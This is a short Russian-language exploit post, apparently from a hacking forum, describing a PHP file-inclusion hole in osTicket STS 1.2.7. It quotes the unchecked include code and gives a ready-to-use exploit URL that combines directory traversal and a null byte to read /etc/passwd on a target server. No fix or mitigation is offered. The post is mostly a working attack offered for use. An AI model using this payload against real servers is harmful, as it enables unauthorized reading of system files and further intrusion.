Уязвимые продукты: osTicket STS 1.2.7 (возможно и старше) 
Тип: PHP-Include 

Результат: Чтение файлов на сервере 

Код в скрипте: 

if ($config[search_disp]) { 
include(«$include_dir/search.php»); 

По идее этот скрипт должен инклудится из другого места, но т.к. проверок никаких нету, мы просто обращаемся к нему. 

Эксплойт: 

http://target/include/mainphp?config[search_disp]= 1&include_dir=../../../../../../.././etc/passwd%00 

Автор: DeCode(iNFERNo)

Оставить мнение